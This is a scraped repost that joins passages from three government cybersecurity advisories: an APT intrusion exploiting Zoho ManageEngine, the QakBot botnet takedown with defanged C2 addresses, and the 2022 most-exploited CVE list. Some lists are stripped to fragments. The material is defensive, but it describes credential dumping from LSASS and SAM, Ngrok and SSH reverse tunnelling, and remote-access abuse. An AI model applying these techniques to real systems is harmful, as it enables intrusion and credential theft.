to conceal PowerShell windows by setting the WindowStyle parameter to hidden.
Technique Title
ID
Use
OS Credential Dumping
T1003
Actors created three files as means for Mimikatz to dump/write credentials to disk on the ServiceDesk system.
OS Credential Dumping: LSASS Memory
T1003.001
Actors successfully accessed and dumped credentials stored in the process memory of LSASS for the AD domain, including with the use of ProcDump.
OS Credential Dumping: Security Account Manager
T1003.002
Actors dumped
sam.hiv
to obtain information about users on the system.
Technique Title
ID
Use
System Network Connections Discovery
T1049
Quser.exe
was executed to acquire information about user sessions on a Remote Desktop Session Host server.
Query Registry
T1012
Actors dumped
system.hiv
and security.hiv
to obtain information about the data used by the operating system.
Remote System Discovery
T1018
Actors downloaded the legitimate file/application
nmap.exe
via the Azure
user to conduct network information gathering efforts.
Network Sniffing
T1040
Actors downloaded the legitimate file/application
npcap.exe
via the Azure
user to conduct credential gathering efforts.
Network Service Discovery
T1046
Actors executed DNS scanning at a web server and directed callback to the
Interact.sh
domain, which indicated the server was susceptible to a DNS-style attack.
Process Discovery
T1057
ProcDump was created at
c:\windows\system32\prc64.exe
as a method for enumerating running processes/applications.
Technique Title
ID
Use
Remote Services: Remote Desktop Protocol
T1021.001
Ngrok was used to establish an RDP connection with the ServiceDesk system.
Lateral Tool Transfer
T1570
Actors compromised one host and moved laterally to install
anydesk.exe
on two additional hosts.
Technique Title
ID
Use
Data Staged
T1074
Actors executed
xpack.exe
malware from a hidden directory. This malware was predominantly used to execute system commands, drop additional malware and tools, and stage data for exfiltration.
Technique Title
ID
Use
Application Layer Protocol: Web Protocols
T1071.001
Hello World
User-Agent string was identified in an HTTP request. Communication occurred between the organization’s web server and an actor-controlled C2 IP address.
Remote Access Software
T1219
Actors leveraged ConnectWise ScreenConnect to connect to the ServiceDesk system.
Anydesk.exe
was run on at least three different hosts in the environment.
Non-Standard Port
T1571
Actors initiated multiple TLS-encrypted sessions on non-standard TCP port
10443
.
Protocol Tunneling
T1572
Actors were observed leveraging SSH to build a reverse tunnel with their C2 server to dynamically forward traffic into the victim organization’s environment.
Using Ngrok as an external service, actors were also able to gain access to and use the command line on victim systems via RDP.
Encrypted Channel: Asymmetric Cryptography
T1573.002
Actors initiated multiple TLS-encrypted sessions on TCP port
10443
, indicating successful data transfer from the firewall device.
DETECTION METHODS
CISA and co-sealers recommend reviewing Tables 3-13: Identified ATT&CK Techniques for Enterprise in conjunction with the detections in this section to identify similar activity.
net user /add
,useradd
, anddscl -create
[DS0017].CreateServiceW()
) to repeatedly execute malicious payloads as part of persistence [DS0009].MITIGATIONS
Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Manage Vulnerabilities and Configurations [CPG 1.E, CPG 3.A]
CISA and co-sealers identified that exploitation of CVE-2022-47966 granted initial access to the public-facing application, Zoho ManageEngine ServiceDesk Plus. Multiple Zoho ManageEngine on-premises products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of version 1.4.1 of Apache XML Security for Java (also known as xmlsec) from the Apache Santuario project. Due to the xmlsec XSLT features by design in that version, the application is responsible for certain security protections. CISA and co-sealers recommend the following:
Segment Networks [CPG 2.F]
CISA and co-sealers identified that the organization did not employ proper network segmentation, such as a demilitarized zone (DMZ), during the initial discovery phase of the incident response. A DMZ serves as a perimeter network that protects and adds an extra layer of security to an organization’s internal local area network (LAN) from untrusted traffic.
Manage Accounts, Permissions, and Workstations
APT actors were able to leverage disabled administrative accounts, as well as clear logs on several critical servers, which prevented the ability to detect follow-on exploitation or data exfiltration. CISA and co-sealers recommend the following:
Secure Remote Access Software
Remote access software provides a proactive and flexible approach for organizations to internally oversee networks, computers, and other devices; however, cyber threat actors increasingly co-opt these tools for access to victim systems. APT actors were observed using legitimate remote access tools—ConnectWise ScreenConnect and AnyDesk—to connect to victim hosts within the organization’s environment and further conduct malicious operations. CISA and co-sealers recommend the following:
For more information, see CISA’s joint Guide to Securing Remote Access Software on best practices for using remote capabilities and how to detect and defend against malicious actors abusing this software.
Other Best Practice Mitigation Recommendations
PROGRAMFILES, PROGRAMFILES(X86), and SYSTEM32. Disallow all other locations unless an exception is granted and documented. Application directory allowlisting can be enabled through Microsoft Software Restriction Policy or AppLocker and can prevent the execution of unauthorized software.
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, CISA and co-sealers recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and co-sealers also recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA and co-sealers recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
RESOURCES
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. CISA, the FBI, and CNMF do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA, the FBI, or CNMF.
REFERENCES
VERSION HISTORY
September 7, 2023: Initial version.
Identification and Disruption of QakBot Infrastructure
SUMMARY
The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory (CSA) to disseminate QakBot infrastructure indicators of compromise (IOCs) identified through FBI investigations as of August 2023. On August 25, FBI and international partners executed a coordinated operation to disrupt QakBot infrastructure worldwide. Disruption operations targeting QakBot infrastructure resulted in the botnet takeover, which severed the connection between victim computers and QakBot command and control (C2) servers. The FBI is working closely with industry partners to share information about the malware to maximize detection, remediation, and prevention measures for network defenders.
CISA and FBI encourage organizations to implement the recommendations in the Mitigations section to reduce the likelihood of QakBot-related activity and promote identification of QakBot-facilitated ransomware and malware infections. Note: The disruption of QakBot infrastructure does not mitigate other previously installed malware or ransomware on victim computers. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to a local FBI Field Office or CISA at cisa.gov/report.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
TECHNICAL DETAILS
Overview
QakBot—also known as Qbot, Quackbot, Pinkslipbot, and TA570—is responsible for thousands of malware infections globally. QakBot has been the precursor to a significant number of computer intrusions, to include ransomware and the compromise of user accounts within the Financial Sector. In existence since at least 2008, QakBot feeds into the global cybercriminal supply chain and has deep-rooted connections to the criminal ecosystem. QakBot was originally used as a banking trojan to steal banking credentials for account compromise; in most cases, it was delivered via phishing campaigns containing malicious attachments or links to download the malware, which would reside in memory once on the victim network.
Since its inception as a banking trojan, QakBot has evolved into a multi-purpose botnet and malware variant that provides threat actors with a wide range of capabilities, to include performing reconnaissance, engaging in lateral movement, gathering and exfiltrating data, and delivering other malicious payloads, including ransomware, on affected devices. QakBot has maintained persistence in the digital environment because of its modular nature. Access to QakBot-affected (victim) devices via compromised credentials is often sold to further the goals of the threat actor who delivered QakBot.
QakBot and affiliated variants have targeted the United States and other global infrastructures, including the Financial Services, Emergency Services, and Commercial Facilities Sectors, and the Election Infrastructure Subsector. FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood of QakBot-related infections and promote identification of QakBot-induced ransomware and malware infections. Disruption of the QakBot botnet does not mitigate other previously installed malware or ransomware on victim computers. If a potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to CISA and FBI.
QakBot Infrastructure
QakBot’s modular structure allows for various malicious features, including process and web injection, victim network enumeration and credential stealing, and the delivery of follow-on payloads such as Cobalt Strike[1], Brute Ratel, and other malware. QakBot infections are particularly known to precede the deployment of human-operated ransomware, including Conti[2], ProLock[3], Egregor[4], REvil[5], MegaCortex[6], Black Basta[7], Royal[8], and PwndLocker.
Historically, QakBot’s C2 infrastructure relied heavily on using hosting providers for its own infrastructure and malicious activity. These providers lease servers to malicious threat actors, ignore abuse complaints, and do not cooperate with law enforcement. At any given time, thousands of victim computers running Microsoft Windows were infected with QakBot—the botnet was controlled through three tiers of C2 servers.
The first tier of C2 servers includes a subset of thousands of bots selected by QakBot administrators, which are promoted to Tier 1 “supernodes” by downloading an additional software module. These supernodes communicate with the victim computers to relay commands and communications between the upstream C2 servers and the infected computers. As of mid-June 2023, 853 supernodes, active that same month, had been identified in 63 countries. Supernodes have been observed changing frequently, which assists QakBot in evading detection by network defenders. Each bot has been observed communicating with a set of Tier 1 supernodes to relay communications to the Tier 2 C2 servers, which serve as proxies to conceal the main C2 server. The Tier 3 server controls all of the bots.
Indicators of Compromise
FBI has observed the following threat actor tactics, techniques, and procedures (TTPs) in association with QakBot infections:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
C:UsersAppDataRoamingMicrosoft
HKEY_CURRENT_USER\Software\Microsoft
In addition, the below IP addresses were assessed to have obtained access to victim computers. Organizations are encouraged to review any connections with these IP addresses, which could potentially indicate a QakBot and/or follow-on malware infection.
Disclaimer: The below IP addresses are assessed to be inactive as of August 29, 2023. Several of these IP addresses were first observed as early as 2020, although most date from 2022 or 2023, and have been historically linked to QakBot. FBI and CISA recommend these IP addresses be investigated or vetted by organizations prior to taking action, such as blocking.
IP Address
First Seen
85.14.243[.]111
April 2020
51.38.62[.]181
April 2021
51.38.62[.]182
December 2021
185.4.67[.]6
April 2022
62.141.42[.]36
April 2022
87.117.247[.]41
May 2022
89.163.212[.]111
May 2022
193.29.187[.]57
May 2022
193.201.9[.]93
June 2022
94.198.50[.]147
August 2022
94.198.50[.]210
August 2022
188.127.243[.]130
September 2022
188.127.243[.]133
September 2022
94.198.51[.]202
October 2022
188.127.242[.]119
November 2022
188.127.242[.]178
November 2022
87.117.247[.]41
December 2022
190.2.143[.]38
December 2022
51.161.202[.]232
January 2023
51.195.49[.]228
January 2023
188.127.243[.]148
January 2023
23.236.181[.]102
Unknown
45.84.224[.]23
Unknown
46.151.30[.]109
Unknown
94.103.85[.]86
Unknown
94.198.53[.]17
Unknown
95.211.95[.]14
Unknown
95.211.172[.]6
Unknown
95.211.172[.]7
Unknown
95.211.172[.]86
Unknown
95.211.172[.]108
Unknown
95.211.172[.]109
Unknown
95.211.198[.]177
Unknown
95.211.250[.]97
Unknown
95.211.250[.]98
Unknown
95.211.250[.]117
Unknown
185.81.114[.]188
Unknown
188.127.243[.]145
Unknown
188.127.243[.]147
Unknown
188.127.243[.]193
Unknown
188.241.58[.]140
Unknown
193.29.187[.]41
Unknown
Organizations are also encouraged to review the Qbot/QakBot Malware presentation from the U.S. Department of Health & Human Services Cybersecurity Program for additional information.
MITRE ATT&CK TECHNIQUES
For detailed associated software descriptions, tactics used, and groups that have been observed using this software, see MITRE ATT&CK’s page on QakBot.[9]
MITIGATIONS
Note: For situational awareness, the following SHA-256 hash is associated with FBI’s QakBot uninstaller:
7cdee5a583eacf24b1f142413aabb4e556ccf4ef3a4764ad084c1526cc90e117
CISA and FBI recommend network defenders apply the following mitigations to reduce the likelihood of QakBot-related activity and promote identification of QakBot-induced ransomware and malware infections. Disruption of the QakBot botnet does not mitigate other already-installed malware or ransomware on victim computers. Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Best Practice Mitigation Recommendations
Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
Ransomware Guidance
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, CISA and FBI recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and FBI also recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA and FBI recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques.
REPORTING
FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with QakBot-affiliated actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. FBI and CISA do not encourage paying ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office or CISA at cisa.gov/report.
RESOURCES
REFERENCES
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.
VERSION HISTORY
August 30, 2023: Initial version.
Source de l’article sur us-cert.gov
2022 Top Routinely Exploited Vulnerabilities
Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’information
SUMMARY
The following cybersecurity agencies coauthored this joint Cybersecurity Advisory (CSA):
This advisory provides details on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2022 and the associated Common Weakness Enumeration(s) (CWE). In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems.
The authoring agencies strongly encourage vendors, designers, developers, and end-user organizations to implement the recommendations found within the Mitigations section of this advisory—including the following—to reduce the risk of compromise by malicious cyber actors.
Download the PDF version of this report:
TECHNICAL DETAILS
Key Findings
In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems. Proof of concept (PoC) code was publicly available for many of the software vulnerabilities or vulnerability chains, likely facilitating exploitation by a broader range of malicious cyber actors.
Malicious cyber actors generally have the most success exploiting known vulnerabilities within the first two years of public disclosure—the value of such vulnerabilities gradually decreases as software is patched or upgraded. Timely patching reduces the effectiveness of known, exploitable vulnerabilities, possibly decreasing the pace of malicious cyber actor operations and forcing pursuit of more costly and time-consuming methods (such as developing zero-day exploits or conducting software supply chain operations).
Malicious cyber actors likely prioritize developing exploits for severe and globally prevalent CVEs. While sophisticated actors also develop tools to exploit other vulnerabilities, developing exploits for critical, wide-spread, and publicly known vulnerabilities gives actors low-cost, high-impact tools they can use for several years. Additionally, cyber actors likely give higher priority to vulnerabilities that are more prevalent in their specific targets’ networks. Multiple CVE or CVE chains require the actor to send a malicious web request to the vulnerable device, which often includes unique signatures that can be detected through deep packet inspection.
Top Routinely Exploited Vulnerabilities
Table 1 shows the top 12 vulnerabilities the co-authors observed malicious cyber actors routinely exploiting in 2022:
CVE
Vendor
Product
Type
CWE
CVE-2018-13379
Fortinet
FortiOS and FortiProxy
SSL VPN credential exposure
CWE-22 Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2021-34473
(ProxyShell)
Microsoft
Exchange Server
RCE
CWE-918 Server-Side Request Forgery (SSRF)
CVE-2021-31207
(ProxyShell)
Microsoft
Exchange Server
Security Feature Bypass
CWE-22 Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2021-34523
(ProxyShell)
Microsoft
Exchange Server
Elevation of Privilege
CWE-287 Improper Authentication
CVE-2021-40539
Zoho ManageEngine
ADSelfService Plus
RCE/
Authentication Bypass
CWE-287 Improper Authentication
CVE-2021-26084
Atlassian
Confluence Server and Data Center
Arbitrary code execution
CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’)
CVE-2021-44228
(Log4Shell)
Apache
Log4j2
RCE
CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement (‘Expression Language Injection’)
CWE-20 Improper Input Validation
CWE-400 Uncontrolled Resource Consumption
CWE-502 Deserialization of Untrusted Data
CVE-2022-22954
VMware
Workspace ONE Access and Identity Manager
RCE
CWE-94 Improper Control of Generation of Code (‘Code Injection’)
CVE-2022-22960
VMware
Workspace ONE Access, Identity Manager, and vRealize Automation
Improper Privilege Management
CWE-269 Improper Privilege Management
CVE-2022-1388
F5 Networks
BIG-IP
Missing Authentication Vulnerability
CWE-306 Missing Authentication for Critical Function
CVE-2022-30190
Microsoft
Multiple Products
RCE
None Listed
CVE-2022-26134
Atlassian
Confluence Server and Data Center
RCE
CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’)
Additional Routinely Exploited Vulnerabilities
In addition to the 12 vulnerabilities listed in Table 1, the authoring agencies identified vulnerabilities—listed in Table 2—that were also routinely exploited by malicious cyber actors in 2022.
CVE
Vendor
Product
Type
CWE
CVE-2017-0199
Microsoft
Multiple Products
Arbitrary Code Execution
None Listed
CVE-2017-11882
Microsoft
Exchange Server
Arbitrary Code Execution
CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer
CVE-2019-11510
Ivanti
Pulse Secure Pulse Connect Secure
Arbitrary File Reading
CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2019-0708
Microsoft
Remote Desktop Services
RCE
CWE-416: Use After Free
CVE-2019-19781
Citrix
Application Delivery Controller and Gateway
Arbitrary Code Execution
CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2020-5902
F5 Networks
BIG-IP
RCE
CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2020-1472
Microsoft
Multiple Products
Privilege Escalation
CWE-330: Use of Insufficiently Random Values
CVE-2020-14882
Oracle
WebLogic Server
RCE
None Listed
CVE-2020-14883
Oracle
WebLogic Server
RCE
None Listed
CVE-2021-20016
SonicWALL
SSLVPN SMA100
SQL Injection
CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)
CVE-2021-26855
(ProxyLogon)
Microsoft
Exchange Server
RCE
CWE-918: Server-Side Request Forgery (SSRF)
CVE-2021-27065
(ProxyLogon)
Microsoft
Exchange Server
RCE
CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2021-26858
(ProxyLogon)
Microsoft
Exchange Server
RCE
None Listed
CVE-2021-26857
(ProxyLogon)
Microsoft
Exchange Server
RCE
CWE-502: Deserialization of Untrusted Data
CVE-2021-20021
SonicWALL
Email Security
Privilege Escalation Exploit Chain
CWE-269: Improper Privilege Management
CVE-2021-40438
Apache
HTTP Server
Server-Side Request Forgery
CWE-918: Server-Side Request Forgery (SSRF)
CVE-2021-41773
Apache
HTTP Server
Server Path Traversal
CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2021-42013
Apache
HTTP Server
Server Path Traversal
CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2021-20038
SonicWall
SMA 100 Series Appliances
Stack-based Buffer Overflow
CWE-787: Out-of-bounds Write
CWE-121: Stack-based Buffer Overflow
CVE-2021-45046
Apache
Log4j
RCE
CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement (‘Expression Language Injection’)
CVE-2022-42475
Fortinet
FortiOS
Heap-based Buffer Overflow
CWE-787: Out-of-bounds Write
CVE-2022-24682
Zimbra
Collaboration Suite
‘Cross-site Scripting’
CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
CVE-2022-22536
SAP
Internet Communication Manager (ICM)
HTTP Request Smuggling
CWE-444: Inconsistent Interpretation of HTTP Requests (‘HTTP Request/Response Smuggling’)
CVE-2022-22963
VMware Tanzu
Spring Cloud
RCE
CWE-94: Improper Control of Generation of Code (‘Code Injection’)
CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement (‘Expression Language Injection’)
CVE-2022-29464
WSO2
Multiple Products
RCE
CWE-434: Unrestricted Upload of File with Dangerous Type
CVE-2022-27924
Zimbra
Zimbra Collaboration Suite
Command Injection
CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’)
CVE-2022-22047
Microsoft
Windows CSRSS
Elevation of Privilege
CWE-269: Improper Privilege Management
CVE-2022-27593
QNAP
QNAP NAS
Externally Controlled Reference
CWE-610: Externally Controlled Reference to a Resource in Another Sphere
CVE-2022-41082
Microsoft
Exchange Server
Privilege Escalation
None Listed
CVE-2022-40684
Fortinet
FortiOS, FortiProxy, FortiSwitchManager
Authentication Bypass
CWE-306: Missing Authentication for Critical Function
MITIGATIONS
Vendors and Developers
The authoring agencies recommend vendors and developers take the following steps to ensure their products are secure by design and default:
For more information on designing secure-by-design and -default products, including additional recommended secure-by-default configurations, see joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Security-by-Design and -Default.
End-User Organizations
The authoring agencies recommend end-user organizations implement the mitigations below to improve cybersecurity posture on the basis of the threat actors’ activity. These mitigations align with the cross-sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on CPGs, including additional recommended baseline protections.
Vulnerability and Configuration Management
Identity and Access Management
Note: See CISA’s Capacity Enhancement Guide – Implementing Strong Authentication and ACSC’s guidance on Implementing Multi-Factor Authentication for more information on authentication system hardening.
Protective Controls and Architecture
Supply Chain Security
RESOURCES
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. CISA, FBI, NSA, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.
PURPOSE
This document was developed by CISA, NSA, FBI, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.
REFERENCES
[1] Apache Log4j Vulnerability Guidance
VERSION HISTORY
August 3, 2023: Initial version.
APPENDIX: PATCH INFORMATION AND ADDITIONAL RESOURCES FOR TOP EXPLOITED VULNERABILITIES
CVE
Vendor
Affected Products and Versions
Patch Information
Resources
CVE-2017-0199
Microsoft
Multiple Products
Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows
CVE-2017-11882
Microsoft
Office, Multiple Versions
Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882
CVE-2018-13379
Fortinet
FortiOS and FortiProxy 2.0.2, 2.0.1, 2.0.0, 1.2.8, 1.2.7, 1.2.6, 1.2.5, 1.2.4, 1.2.3, 1.2.2, 1.2.1, 1.2.0, 1.1.6
FortiProxy – system file leak through SSL VPN special crafted HTTP resource requests
Joint CSAs:
Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities
Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology
APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations
CVE-2019-11510
Ivanti
Pulse Secure Pulse Connect Secure versions, 9.0R1 to 9.0R3.3, 8.3R1 to 8.3R7, and 8.2R1 to 8.2R12
SA44101 – 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX
CISA Alerts:
Continued Exploitation of Pulse Secure VPN Vulnerability
Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity
ACSC Advisory:
2019-129: Recommendations to mitigate vulnerability in Pulse Connect Secure VPN Software
Joint CSA:
APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations
CCCS Alert:
APT Actors Target U.S. and Allied Networks – Update 1
CVE-2019-0708
Microsoft
Remote Desktop Services
Remote Desktop Services Remote Code Execution Vulnerability
CVE-2019-19781
Citrix
ADC and Gateway version 13.0 all supported builds before 13.0.47.24
NetScaler ADC and NetScaler Gateway, version 12.1 all supported builds before 12.1.55.18; version 12.0 all supported builds before 12.0.63.13; version 11.1 all supported builds before 11.1.63.15; version 10.5 all supported builds before 10.5.70.12
SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b
CVE-2019-19781 – Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance
Joint CSAs:
APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations
Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity
CCCS Alert:
Detecting Compromises relating to Citrix CVE-2019-19781
CVE-2020-5902
F5
BIG IP versions 15.1.0, 15.0.0 to 15.0.1, 14.1.0 to 14.1.2, 13.1.0 to 13.1.3, 12.1.0 to 12.1.5, and 11.6.1 to 11.6.5
K52145254: TMUI RCE vulnerability CVE-2020-5902
CISA Alert:
Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902
CVE-2020-1472
Microsoft
Windows Server, Multiple Versions
Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472
ACSC Advisory:
2020-016: Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472)
Joint CSA:
APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations
CCCS Alert:
Microsoft Netlogon Elevation of Privilege Vulnerability – CVE-2020-1472 – Update 1
CVE-2020-14882
Oracle
WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
Oracle Critical Patch Update Advisory – October 2020
CVE-2020-14883
Oracle
WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
Oracle Critical Patch Update Advisory – October 2020
CVE-2021-20016
SonicWALL
SSLVPN SMA100, Build Version 10.x
Confirmed Zero-day vulnerability in the SonicWall SMA100 build version 10.x
CVE-2021-26855
Microsoft
Exchange Server, Multiple Versions
Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855
CISA Alert:
Mitigate Microsoft Exchange Server Vulnerabilities
CISA Alert:
Mitigate Microsoft Exchange Server Vulnerabilities
CVE-2021-26858
Microsoft
Exchange Server, Multiple Versions
Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26858
CISA Alert:
Mitigate Microsoft Exchange Server Vulnerabilities
CVE-2021-27065
Microsoft
Multiple Products
Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-27065
CISA Alert:
Mitigate Microsoft Exchange Server Vulnerabilities
CVE-2021-20021
SonicWALL
Email Security version 10.0.9.x Email Security
SonicWall Email Security pre-authentication administrative account creation vulnerability
CVE-2021-31207
Microsoft
Exchange Server, Multiple Versions
Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31207
CISA Alert:
Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities
ACSC Alert:
Microsoft Exchange ProxyShell Targeting in Australia
CVE-2022-26134
Atlassian
Confluence Server and Data Center, versions: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1
Confluence Security Advisory 2022-06-02
CISA Alert:
CISA Adds One Known Exploited Vulnerability (CVE-2022-26134) to Catalog
ACSC Alert:
Remote code execution vulnerability present in Atlassian Confluence Server and Data Center
CVE-2021-34473
Microsoft
Exchange Server, Multiple Version
Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473
Joint CSA:
Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities
CVE-2021-34523
Microsoft
Microsoft Exchange Server 2013 Cumulative Update 23
Microsoft Exchange Server 2016 Cumulative Updates 19 and 20
Microsoft Exchange Server 2019 Cumulative Updates 8 and 9
Microsoft Exchange Server Elevation of Privilege Vulnerability, CVE-2021-34523
CISA Alert:
Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities
CVE-2021-26084
Jira Atlassian
Confluence Server and Data Center, versions 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
Jira Atlassian: Confluence Server Webwork OGNL injection – CVE-2021-26084
CISA Alert:
Atlassian Releases Security Updates for Confluence Server and Data Center
CVE-2021-40539
Zoho ManageEngine Corp.
ManageEngine ADSelfService Plus builds up to 6113
Security advisory – ADSelfService Plus authentication bypass vulnerability
ACSC Alert:
Critical vulnerability in ManageEngine ADSelfService Plus exploited by cyber actors
CVE-2021-40438
Apache
HTTP Server 2.4.48
CVE-2021-41773
Apache
Apache HTTP Server 2.4.49
Apache HTTP Server 2.4 vulnerabilities
CVE-2021-42013
Apache
Apache HTTP Server 2.4.50
Apache HTTP Server 2.4 vulnerabilities
CVE-2021-20038
SonicWall
SMA 100 Series (SMA 200, 210, 400, 410, 500v), versions 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv; SMA 100 series appliances
SonicWall patches multiple SMA100 affected vulnerabilities
ACSC Alert:
CCCS Alert:
SonicWall Security Advisory
CVE-2021-44228
Apache
Log4j, all versions from 2.0-beta9 to 2.14.1
For other affected vendors and products, see CISA’s GitHub repository.
Apache Log4j Security Vulnerabilities
For additional information, see joint CSA: Mitigating Log4Shell and Other Log4j-Related Vulnerabilities
CISA webpage:
Apache Log4j Vulnerability Guidance
CCCS Alert:
Active exploitation of Apache Log4j vulnerability – Update 7
